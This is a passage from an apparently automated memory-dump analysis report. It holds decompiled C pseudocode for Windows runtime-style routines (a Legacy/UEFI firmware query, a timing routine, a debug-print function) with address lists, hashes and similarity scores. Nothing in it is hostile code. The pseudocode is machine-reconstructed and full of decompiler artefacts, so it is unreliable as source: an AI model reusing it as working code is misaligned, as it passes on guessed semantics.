                                                          				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                                                          				 *((intOrPtr*)(_t118 - 4)) = 0;
                                                          				_t100 = __ecx;
                                                          				if(_t100 == 0) {
                                                          					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                          					E010CEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                          					 *((char*)(_t118 - 0x65)) = 1;
                                                          					_t63 =  *(_t118 - 0x90);
                                                          					_t101 = _t63[2];
                                                          					_t64 =  *_t63 & 0x0000ffff;
                                                          					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                          					L20:
                                                          					_t65 = _t64 >> 1;
                                                          					L21:
                                                          					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                                                          					if(_t108 == 0) {
                                                          						L27:
                                                          						 *_t115 = _t65 + 1;
                                                          						_t67 = 0xc0000023;
                                                          						L28:
                                                          						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                                                          						L29:
                                                          						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                                                          						E011353CA(0);
                                                          						return E0110D130(0, _t113, _t115);
                                                          					}
                                                          					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                                                          						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                                                          							 *_t108 = 0;
                                                          						}
                                                          						goto L27;
                                                          					}
                                                          					 *_t115 = _t65;
                                                          					_t115 = _t65 + _t65;
                                                          					E010FF3E0(_t108, _t101, _t115);
                                                          					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                                                          					_t67 = 0;
                                                          					goto L28;
                                                          				}
                                                          				_t103 = _t100 - 1;
                                                          				if(_t103 == 0) {
                                                          					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                                                          					_t74 = E010D3690(1, _t117, 0x1091810, _t118 - 0x74);
                                                          					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                                                          					_t101 = _t117[2];
                                                          					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                          					if(_t74 < 0) {
                                                          						_t64 =  *_t117 & 0x0000ffff;
                                                          						_t115 =  *(_t118 - 0x7c);
                                                          						goto L20;
                                                          					}
                                                          					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                                                          					_t115 =  *(_t118 - 0x7c);
                                                          					goto L21;
                                                          				}
                                                          				if(_t103 == 1) {
                                                          					_t105 = 4;
                                                          					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                                                          					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                                                          					_push(_t118 - 0x70);
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(_t105);
                                                          					_push(_t118 - 0x78);
                                                          					_push(0x6b);
                                                          					 *((intOrPtr*)(_t118 - 0x64)) = E010FAA90();
                                                          					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                          					_t113 = L010D4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                                                          					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                                                          					if(_t113 != 0) {
                                                          						_push(_t118 - 0x70);
                                                          						_push( *((intOrPtr*)(_t118 - 0x70)));
                                                          						_push(_t113);
                                                          						_push(4);
                                                          						_push(_t118 - 0x78);
                                                          						_push(0x6b);
                                                          						_t84 = E010FAA90();
                                                          						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                                                          						if(_t84 < 0) {
                                                          							goto L29;
                                                          						}
                                                          						_t110 = 0;
                                                          						_t106 = 0;
                                                          						while(1) {
                                                          							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                                                          							 *(_t118 - 0x88) = _t106;
                                                          							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                                                          								break;
                                                          							}
                                                          							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                                                          							_t106 = _t106 + 1;
                                                          						}
                                                          						_t88 = E0113500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                                                          						_t119 = _t119 + 0x1c;
                                                          						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                                                          						if(_t88 < 0) {
                                                          							goto L29;
                                                          						}
                                                          						_t101 = _t118 - 0x3c;
                                                          						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                                                          						goto L21;
                                                          					}
                                                          					_t67 = 0xc0000017;
                                                          					goto L28;
                                                          				}
                                                          				_push(0);
                                                          				_push(0x20);
                                                          				_push(_t118 - 0x60);
                                                          				_push(0x5a);
                                                          				_t94 = E010F9860();
                                                          				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                                                          				if(_t94 < 0) {
                                                          					goto L29;
                                                          				}
                                                          				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                                                          					_t101 = L"Legacy";
                                                          					_push(6);
                                                          				} else {
                                                          					_t101 = L"UEFI";
                                                          					_push(4);
                                                          				}
                                                          				_pop(_t65);
                                                          				goto L21;
                                                          			}






















                                                          0x011351be
                                                          0x011351c3
                                                          0x011351c8
                                                          0x011351cd
                                                          0x011351d0
                                                          0x011351d3
                                                          0x011351d8
                                                          0x011351db
                                                          0x011351de
                                                          0x011351e0
                                                          0x011351e3
                                                          0x011351e6
                                                          0x011351e8
                                                          0x01135342
                                                          0x01135351
                                                          0x01135356
                                                          0x0113535a
                                                          0x01135360
                                                          0x01135363
                                                          0x01135366
                                                          0x01135369
                                                          0x01135369
                                                          0x0113536b
                                                          0x0113536b
                                                          0x01135370
                                                          0x011353a3
                                                          0x011353a4
                                                          0x011353a6
                                                          0x011353ab
                                                          0x011353ab
                                                          0x011353ae
                                                          0x011353ae
                                                          0x011353b5
                                                          0x011353bf
                                                          0x011353bf
                                                          0x01135375
                                                          0x01135396
                                                          0x011353a0
                                                          0x011353a0
                                                          0x00000000
                                                          0x01135396
                                                          0x01135377
                                                          0x01135379
                                                          0x0113537f
                                                          0x0113538c
                                                          0x01135390
                                                          0x00000000
                                                          0x01135390
                                                          0x011351ee
                                                          0x011351f1
                                                          0x01135301
                                                          0x01135310
                                                          0x01135315
                                                          0x01135318
                                                          0x0113531b
                                                          0x01135320
                                                          0x0113532e
                                                          0x01135331
                                                          0x00000000
                                                          0x01135331
                                                          0x01135328
                                                          0x01135329
                                                          0x00000000
                                                          0x01135329
                                                          0x011351fa
                                                          0x01135235
                                                          0x01135236
                                                          0x01135239
                                                          0x0113523f
                                                          0x01135240
                                                          0x01135241
                                                          0x01135242
                                                          0x01135246
                                                          0x01135247
                                                          0x0113524e
                                                          0x01135251
                                                          0x01135267
                                                          0x01135269
                                                          0x0113526e
                                                          0x0113527d
                                                          0x0113527e
                                                          0x01135281
                                                          0x01135282
                                                          0x01135287
                                                          0x01135288
                                                          0x0113528a
                                                          0x0113528f
                                                          0x01135294
                                                          0x00000000
                                                          0x00000000
                                                          0x0113529a
                                                          0x0113529c
                                                          0x0113529e
                                                          0x0113529e
                                                          0x011352a4
                                                          0x011352b0
                                                          0x00000000
                                                          0x00000000
                                                          0x011352ba
                                                          0x011352bc
                                                          0x011352bc
                                                          0x011352d4
                                                          0x011352d9
                                                          0x011352dc
                                                          0x011352e1
                                                          0x00000000
                                                          0x00000000
                                                          0x011352e7
                                                          0x011352f4
                                                          0x00000000
                                                          0x011352f4
                                                          0x01135270
                                                          0x00000000
                                                          0x01135270
                                                          0x011351fc
                                                          0x011351fd
                                                          0x01135202
                                                          0x01135203
                                                          0x01135205
                                                          0x0113520a
                                                          0x0113520f
                                                          0x00000000
                                                          0x00000000
                                                          0x0113521b
                                                          0x01135226
                                                          0x0113522b
                                                          0x0113521d
                                                          0x0113521d
                                                          0x01135222
                                                          0x01135222
                                                          0x0113522d
                                                          0x00000000

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID: Legacy$UEFI
                                                          • API String ID: 2994545307-634100481
                                                          • Opcode ID: a5761e2c6a0d545f7a7fab6f55de0bc653e07faeb6d690732624ab77a10060cc
                                                          • Instruction ID: bb510a83412911ba654c978ae5fe5b71eb590f6e7dd4469b2c62aa1a96218713
                                                          • Opcode Fuzzy Hash: a5761e2c6a0d545f7a7fab6f55de0bc653e07faeb6d690732624ab77a10060cc
                                                          • Instruction Fuzzy Hash: FD517C71E04609DFDB68DFA8C990BAEBBF9FB88B00F14402DE649EB255D7719900CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 76%
                                                          			E010DB944(signed int* __ecx, char __edx) {
                                                          				signed int _v8;
                                                          				signed int _v16;
                                                          				signed int _v20;
                                                          				char _v28;
                                                          				signed int _v32;
                                                          				char _v36;
                                                          				signed int _v40;
                                                          				intOrPtr _v44;
                                                          				signed int* _v48;
                                                          				signed int _v52;
                                                          				signed int _v56;
                                                          				intOrPtr _v60;
                                                          				intOrPtr _v64;
                                                          				intOrPtr _v68;
                                                          				intOrPtr _v72;
                                                          				intOrPtr _v76;
                                                          				char _v77;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				intOrPtr* _t65;
                                                          				intOrPtr _t67;
                                                          				intOrPtr _t68;
                                                          				char* _t73;
                                                          				intOrPtr _t77;
                                                          				intOrPtr _t78;
                                                          				signed int _t82;
                                                          				intOrPtr _t83;
                                                          				void* _t87;
                                                          				char _t88;
                                                          				intOrPtr* _t89;
                                                          				intOrPtr _t91;
                                                          				void* _t97;
                                                          				intOrPtr _t100;
                                                          				void* _t102;
                                                          				void* _t107;
                                                          				signed int _t108;
                                                          				intOrPtr* _t112;
                                                          				void* _t113;
                                                          				intOrPtr* _t114;
                                                          				intOrPtr _t115;
                                                          				intOrPtr _t116;
                                                          				intOrPtr _t117;
                                                          				signed int _t118;
                                                          				void* _t130;
                                                          
                                                          				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                                                          				_v8 =  *0x11ad360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                                                          				_t112 = __ecx;
                                                          				_v77 = __edx;
                                                          				_v48 = __ecx;
                                                          				_v28 = 0;
                                                          				_t5 = _t112 + 0xc; // 0x575651ff
                                                          				_t105 =  *_t5;
                                                          				_v20 = 0;
                                                          				_v16 = 0;
                                                          				if(_t105 == 0) {
                                                          					_t50 = _t112 + 4; // 0x5de58b5b
                                                          					_t60 =  *__ecx |  *_t50;
                                                          					if(( *__ecx |  *_t50) != 0) {
                                                          						 *__ecx = 0;
                                                          						__ecx[1] = 0;
                                                          						if(E010D7D50() != 0) {
                                                          							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                          						} else {
                                                          							_t65 = 0x7ffe0386;
                                                          						}
                                                          						if( *_t65 != 0) {
                                                          							E01188CD6(_t112);
                                                          						}
                                                          						_push(0);
                                                          						_t52 = _t112 + 0x10; // 0x778df98b
                                                          						_push( *_t52);
                                                          						_t60 = E010F9E20();
                                                          					}
                                                          					L20:
                                                          					_pop(_t107);
                                                          					_pop(_t113);
                                                          					_pop(_t87);
                                                          					return E010FB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                                                          				}
                                                          				_t8 = _t112 + 8; // 0x8b000cc2
                                                          				_t67 =  *_t8;
                                                          				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                                                          				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                                                          				_t108 =  *(_t67 + 0x14);
                                                          				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                                                          				_t105 = 0x2710;
                                                          				asm("sbb eax, edi");
                                                          				_v44 = _t88;
                                                          				_v52 = _t108;
                                                          				_t60 = E010FCE00(_t97, _t68, 0x2710, 0);
                                                          				_v56 = _t60;
                                                          				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                                                          					L3:
                                                          					 *(_t112 + 0x44) = _t60;
                                                          					_t105 = _t60 * 0x2710 >> 0x20;
                                                          					 *_t112 = _t88;
                                                          					 *(_t112 + 4) = _t108;
                                                          					_v20 = _t60 * 0x2710;
                                                          					_v16 = _t60 * 0x2710 >> 0x20;
                                                          					if(_v77 != 0) {
                                                          						L16:
                                                          						_v36 = _t88;
                                                          						_v32 = _t108;
                                                          						if(E010D7D50() != 0) {
                                                          							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                          						} else {
                                                          							_t73 = 0x7ffe0386;
                                                          						}
                                                          						if( *_t73 != 0) {
                                                          							_t105 = _v40;
                                                          							E01188F6A(_t112, _v40, _t88, _t108);
                                                          						}
                                                          						_push( &_v28);
                                                          						_push(0);
                                                          						_push( &_v36);
                                                          						_t48 = _t112 + 0x10; // 0x778df98b
                                                          						_push( *_t48);
                                                          						_t60 = E010FAF60();
                                                          						goto L20;
                                                          					} else {
                                                          						_t89 = 0x7ffe03b0;
                                                          						do {
                                                          							_t114 = 0x7ffe0010;
                                                          							do {
                                                          								_t77 =  *0x11a8628; // 0x0
                                                          								_v68 = _t77;
                                                          								_t78 =  *0x11a862c; // 0x0
                                                          								_v64 = _t78;
                                                          								_v72 =  *_t89;
                                                          								_v76 =  *((intOrPtr*)(_t89 + 4));
                                                          								while(1) {
                                                          									_t105 =  *0x7ffe000c;
                                                          									_t100 =  *0x7ffe0008;
                                                          									if(_t105 ==  *_t114) {
                                                          										goto L8;
                                                          									}
                                                          									asm("pause");
                                                          								}
                                                          								L8:
                                                          								_t89 = 0x7ffe03b0;
                                                          								_t115 =  *0x7ffe03b0;
                                                          								_t82 =  *0x7FFE03B4;
                                                          								_v60 = _t115;
                                                          								_t114 = 0x7ffe0010;
                                                          								_v56 = _t82;
                                                          							} while (_v72 != _t115 || _v76 != _t82);
                                                          							_t83 =  *0x11a8628; // 0x0
                                                          							_t116 =  *0x11a862c; // 0x0
                                                          							_v76 = _t116;
                                                          							_t117 = _v68;
                                                          						} while (_t117 != _t83 || _v64 != _v76);
                                                          						asm("sbb edx, [esp+0x24]");
                                                          						_t102 = _t100 - _v60 - _t117;
                                                          						_t112 = _v48;
                                                          						_t91 = _v44;
                                                          						asm("sbb edx, eax");
                                                          						_t130 = _t105 - _v52;
                                                          						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                                                          							_t88 = _t102 - _t91;
                                                          							asm("sbb edx, edi");
                                                          							_t108 = _t105;
                                                          						} else {
                                                          							_t88 = 0;
                                                          							_t108 = 0;
                                                          						}
                                                          						goto L16;
                                                          					}
                                                          				} else {
                                                          					if( *(_t112 + 0x44) == _t60) {
                                                          						goto L20;
                                                          					}
                                                          					goto L3;
                                                          				}
                                                          			}
















































                                                          0x010db94c
                                                          0x010db956
                                                          0x010db95c
                                                          0x010db95e
                                                          0x010db964
                                                          0x010db969
                                                          0x010db96d
                                                          0x010db96d
                                                          0x010db970
                                                          0x010db974
                                                          0x010db97a
                                                          0x010dbadf
                                                          0x010dbadf
                                                          0x010dbae2
                                                          0x010dbae4
                                                          0x010dbae6
                                                          0x010dbaf0
                                                          0x01122cb8
                                                          0x010dbaf6
                                                          0x010dbaf6
                                                          0x010dbaf6
                                                          0x010dbafd
                                                          0x010dbb1f
                                                          0x010dbb1f
                                                          0x010dbaff
                                                          0x010dbb00
                                                          0x010dbb00
                                                          0x010dbb03
                                                          0x010dbb03
                                                          0x010dbacb
                                                          0x010dbacf
                                                          0x010dbad0
                                                          0x010dbad1
                                                          0x010dbadc
                                                          0x010dbadc
                                                          0x010db980
                                                          0x010db980
                                                          0x010db988
                                                          0x010db98b
                                                          0x010db98d
                                                          0x010db990
                                                          0x010db993
                                                          0x010db999
                                                          0x010db99b
                                                          0x010db9a1
                                                          0x010db9a5
                                                          0x010db9aa
                                                          0x010db9b0
                                                          0x010db9bb
                                                          0x010db9c0
                                                          0x010db9c3
                                                          0x010db9ca
                                                          0x010db9cc
                                                          0x010db9cf
                                                          0x010db9d3
                                                          0x010db9d7
                                                          0x010dba94
                                                          0x010dba94
                                                          0x010dba98
                                                          0x010dbaa3
                                                          0x01122ccb
                                                          0x010dbaa9
                                                          0x010dbaa9
                                                          0x010dbaa9
                                                          0x010dbab1
                                                          0x01122cd5
                                                          0x01122cdd
                                                          0x01122cdd
                                                          0x010dbabb
                                                          0x010dbabc
                                                          0x010dbac2
                                                          0x010dbac3
                                                          0x010dbac3
                                                          0x010dbac6
                                                          0x00000000
                                                          0x010db9dd
                                                          0x010db9dd
                                                          0x010db9e7
                                                          0x010db9e7
                                                          0x010db9ec
                                                          0x010db9ec
                                                          0x010db9f1
                                                          0x010db9f5
                                                          0x010db9fa
                                                          0x010dba00
                                                          0x010dba0c
                                                          0x010dba10
                                                          0x010dba10
                                                          0x010dba12
                                                          0x010dba18
                                                          0x00000000
                                                          0x00000000
                                                          0x010dbb26
                                                          0x010dbb26
                                                          0x010dba1e
                                                          0x010dba1e
                                                          0x010dba23
                                                          0x010dba25
                                                          0x010dba2c
                                                          0x010dba30
                                                          0x010dba35
                                                          0x010dba35
                                                          0x010dba41
                                                          0x010dba46
                                                          0x010dba4c
                                                          0x010dba50
                                                          0x010dba54
                                                          0x010dba6a
                                                          0x010dba6e
                                                          0x010dba70
                                                          0x010dba74
                                                          0x010dba78
                                                          0x010dba7a
                                                          0x010dba7c
                                                          0x010dba8e
                                                          0x010dba90
                                                          0x010dba92
                                                          0x010dbb14
                                                          0x010dbb14
                                                          0x010dbb16
                                                          0x010dbb16
                                                          0x00000000
                                                          0x010dba7c
                                                          0x010dbb0a
                                                          0x010dbb0d
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010dbb0f

                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 010DB9A5
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID:
                                                          • API String ID: 885266447-0
                                                          • Opcode ID: 201e99ef7798c92912d3fbcee0957a4c2877fe97159ac331ef6c33ba229b1660
                                                          • Instruction ID: 221897eb62ae8f374644b1f36e1bb63744a1a9748532fb2b8023e56d32f8c48e
                                                          • Opcode Fuzzy Hash: 201e99ef7798c92912d3fbcee0957a4c2877fe97159ac331ef6c33ba229b1660
                                                          • Instruction Fuzzy Hash: 10515571A08341CFC724DF2DC08092ABBE5BB89610F56896EFAD987345DB70E844CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 78%
                                                          			E010BB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                                                          				signed int _t65;
                                                          				signed short _t69;
                                                          				intOrPtr _t70;
                                                          				signed short _t85;
                                                          				void* _t86;
                                                          				signed short _t89;
                                                          				signed short _t91;
                                                          				intOrPtr _t92;
                                                          				intOrPtr _t97;
                                                          				intOrPtr* _t98;
                                                          				signed short _t99;
                                                          				signed short _t101;
                                                          				void* _t102;
                                                          				char* _t103;
                                                          				signed short _t104;
                                                          				intOrPtr* _t110;
                                                          				void* _t111;
                                                          				void* _t114;
                                                          				intOrPtr* _t115;
                                                          
                                                          				_t109 = __esi;
                                                          				_t108 = __edi;
                                                          				_t106 = __edx;
                                                          				_t95 = __ebx;
                                                          				_push(0x90);
                                                          				_push(0x118f7a8);
                                                          				E0110D0E8(__ebx, __edi, __esi);
                                                          				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                                                          				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                                                          				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                                                          				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                                                          				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                                                          				if(__edx == 0xffffffff) {
                                                          					L6:
                                                          					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                                                          					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                                                          					__eflags = _t65 & 0x00000002;
                                                          					if((_t65 & 0x00000002) != 0) {
                                                          						L3:
                                                          						L4:
                                                          						return E0110D130(_t95, _t108, _t109);
                                                          					}
                                                          					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                                                          					_t108 = 0;
                                                          					_t109 = 0;
                                                          					_t95 = 0;
                                                          					__eflags = 0;
                                                          					while(1) {
                                                          						__eflags = _t95 - 0x200;
                                                          						if(_t95 >= 0x200) {
                                                          							break;
                                                          						}
                                                          						E010FD000(0x80);
                                                          						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                                                          						_t108 = _t115;
                                                          						_t95 = _t95 - 0xffffff80;
                                                          						_t17 = _t114 - 4;
                                                          						 *_t17 =  *(_t114 - 4) & 0x00000000;
                                                          						__eflags =  *_t17;
                                                          						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                                                          						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                                                          						_t102 = _t110 + 1;
                                                          						do {
                                                          							_t85 =  *_t110;
                                                          							_t110 = _t110 + 1;
                                                          							__eflags = _t85;
                                                          						} while (_t85 != 0);
                                                          						_t111 = _t110 - _t102;
                                                          						_t21 = _t95 - 1; // -129
                                                          						_t86 = _t21;
                                                          						__eflags = _t111 - _t86;
                                                          						if(_t111 > _t86) {
                                                          							_t111 = _t86;
                                                          						}
                                                          						E010FF3E0(_t108, _t106, _t111);
                                                          						_t115 = _t115 + 0xc;
                                                          						_t103 = _t111 + _t108;
                                                          						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                                                          						_t89 = _t95 - _t111;
                                                          						__eflags = _t89;
                                                          						_push(0);
                                                          						if(_t89 == 0) {
                                                          							L15:
                                                          							_t109 = 0xc000000d;
                                                          							goto L16;
                                                          						} else {
                                                          							__eflags = _t89 - 0x7fffffff;
                                                          							if(_t89 <= 0x7fffffff) {
                                                          								L16:
                                                          								 *(_t114 - 0x94) = _t109;
                                                          								__eflags = _t109;
                                                          								if(_t109 < 0) {
                                                          									__eflags = _t89;
                                                          									if(_t89 != 0) {
                                                          										 *_t103 = 0;
                                                          									}
                                                          									L26:
                                                          									 *(_t114 - 0xa0) = _t109;
                                                          									 *(_t114 - 4) = 0xfffffffe;
                                                          									__eflags = _t109;
                                                          									if(_t109 >= 0) {
                                                          										L31:
                                                          										_t98 = _t108;
                                                          										_t39 = _t98 + 1; // 0x1
                                                          										_t106 = _t39;
                                                          										do {
                                                          											_t69 =  *_t98;
                                                          											_t98 = _t98 + 1;
                                                          											__eflags = _t69;
                                                          										} while (_t69 != 0);
                                                          										_t99 = _t98 - _t106;
                                                          										__eflags = _t99;
                                                          										L34:
                                                          										_t70 =  *[fs:0x30];
                                                          										__eflags =  *((char*)(_t70 + 2));
                                                          										if( *((char*)(_t70 + 2)) != 0) {
                                                          											L40:
                                                          											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                                                          											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                                                          											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                                                          											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                                                          											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                                                          											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                                                          											 *(_t114 - 4) = 1;
                                                          											_push(_t114 - 0x74);
                                                          											L0110DEF0(_t99, _t106);
                                                          											 *(_t114 - 4) = 0xfffffffe;
                                                          											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                          											goto L3;
                                                          										}
                                                          										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                                                          										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                                                          											goto L40;
                                                          										}
                                                          										_push( *((intOrPtr*)(_t114 + 8)));
                                                          										_push( *((intOrPtr*)(_t114 - 0x9c)));
                                                          										_push(_t99 & 0x0000ffff);
                                                          										_push(_t108);
                                                          										_push(1);
                                                          										_t101 = E010FB280();
                                                          										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                                                          										if( *((char*)(_t114 + 0x14)) == 1) {
                                                          											__eflags = _t101 - 0x80000003;
                                                          											if(_t101 == 0x80000003) {
                                                          												E010FB7E0(1);
                                                          												_t101 = 0;
                                                          												__eflags = 0;
                                                          											}
                                                          										}
                                                          										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                          										goto L4;
                                                          									}
                                                          									__eflags = _t109 - 0x80000005;
                                                          									if(_t109 == 0x80000005) {
                                                          										continue;
                                                          									}
                                                          									break;
                                                          								}
                                                          								 *(_t114 - 0x90) = 0;
                                                          								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                                                          								_t91 = E010FE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                                                          								_t115 = _t115 + 0x10;
                                                          								_t104 = _t91;
                                                          								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                                                          								__eflags = _t104;
                                                          								if(_t104 < 0) {
                                                          									L21:
                                                          									_t109 = 0x80000005;
                                                          									 *(_t114 - 0x90) = 0x80000005;
                                                          									L22:
                                                          									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                                                          									L23:
                                                          									 *(_t114 - 0x94) = _t109;
                                                          									goto L26;
                                                          								}
                                                          								__eflags = _t104 - _t92;
                                                          								if(__eflags > 0) {
                                                          									goto L21;
                                                          								}
                                                          								if(__eflags == 0) {
                                                          									goto L22;
                                                          								}
                                                          								goto L23;
                                                          							}
                                                          							goto L15;
                                                          						}
                                                          					}
                                                          					__eflags = _t109;
                                                          					if(_t109 >= 0) {
                                                          						goto L31;
                                                          					}
                                                          					__eflags = _t109 - 0x80000005;
                                                          					if(_t109 != 0x80000005) {
                                                          						goto L31;
                                                          					}
                                                          					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                                                          					_t38 = _t95 - 1; // -129
                                                          					_t99 = _t38;
                                                          					goto L34;
                                                          				}
                                                          				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                          					__eflags = __edx - 0x65;
                                                          					if(__edx != 0x65) {
                                                          						goto L2;
                                                          					}
                                                          					goto L6;
                                                          				}
                                                          				L2:
                                                          				_push( *((intOrPtr*)(_t114 + 8)));
                                                          				_push(_t106);
                                                          				if(E010FA890() != 0) {
                                                          					goto L6;
                                                          				}
                                                          				goto L3;
                                                          			}






















                                                          0x010bb171
                                                          0x010bb171
                                                          0x010bb171
                                                          0x010bb171
                                                          0x010bb171
                                                          0x010bb176
                                                          0x010bb17b
                                                          0x010bb180
                                                          0x010bb186
                                                          0x010bb18f
                                                          0x010bb198
                                                          0x010bb1a4
                                                          0x010bb1aa
                                                          0x01114802
                                                          0x01114802
                                                          0x01114805
                                                          0x0111480c
                                                          0x0111480e
                                                          0x010bb1d1
                                                          0x010bb1d3
                                                          0x010bb1de
                                                          0x010bb1de
                                                          0x01114817
                                                          0x0111481e
                                                          0x01114820
                                                          0x01114822
                                                          0x01114822
                                                          0x01114824
                                                          0x01114824
                                                          0x0111482a
                                                          0x00000000
                                                          0x00000000
                                                          0x01114835
                                                          0x0111483a
                                                          0x0111483d
                                                          0x0111483f
                                                          0x01114842
                                                          0x01114842
                                                          0x01114842
                                                          0x01114846
                                                          0x0111484c
                                                          0x0111484e
                                                          0x01114851
                                                          0x01114851
                                                          0x01114853
                                                          0x01114854
                                                          0x01114854
                                                          0x01114858
                                                          0x0111485a
                                                          0x0111485a
                                                          0x0111485d
                                                          0x0111485f
                                                          0x01114861
                                                          0x01114861
                                                          0x01114866
                                                          0x0111486b
                                                          0x0111486e
                                                          0x01114871
                                                          0x01114876
                                                          0x01114876
                                                          0x01114878
                                                          0x0111487b
                                                          0x01114884
                                                          0x01114884
                                                          0x00000000
                                                          0x0111487d
                                                          0x0111487d
                                                          0x01114882
                                                          0x01114889
                                                          0x01114889
                                                          0x0111488f
                                                          0x01114891
                                                          0x011148e0
                                                          0x011148e2
                                                          0x011148e4
                                                          0x011148e4
                                                          0x011148e7
                                                          0x011148e7
                                                          0x011148ed
                                                          0x011148f4
                                                          0x011148f6
                                                          0x01114951
                                                          0x01114951
                                                          0x01114953
                                                          0x01114953
                                                          0x01114956
                                                          0x01114956
                                                          0x01114958
                                                          0x01114959
                                                          0x01114959
                                                          0x0111495d
                                                          0x0111495d
                                                          0x0111495f
                                                          0x0111495f
                                                          0x01114965
                                                          0x01114969
                                                          0x011149ba
                                                          0x011149ba
                                                          0x011149c1
                                                          0x011149c5
                                                          0x011149cc
                                                          0x011149d4
                                                          0x011149d7
                                                          0x011149da
                                                          0x011149e4
                                                          0x011149e5
                                                          0x011149f3
                                                          0x01114a02
                                                          0x00000000
                                                          0x01114a02
                                                          0x01114972
                                                          0x01114974
                                                          0x00000000
                                                          0x00000000
                                                          0x01114976
                                                          0x01114979
                                                          0x01114982
                                                          0x01114983
                                                          0x01114984
                                                          0x0111498b
                                                          0x0111498d
                                                          0x01114991
                                                          0x01114993
                                                          0x01114999
                                                          0x0111499d
                                                          0x011149a2
                                                          0x011149a2
                                                          0x011149a2
                                                          0x01114999
                                                          0x011149ac
                                                          0x00000000
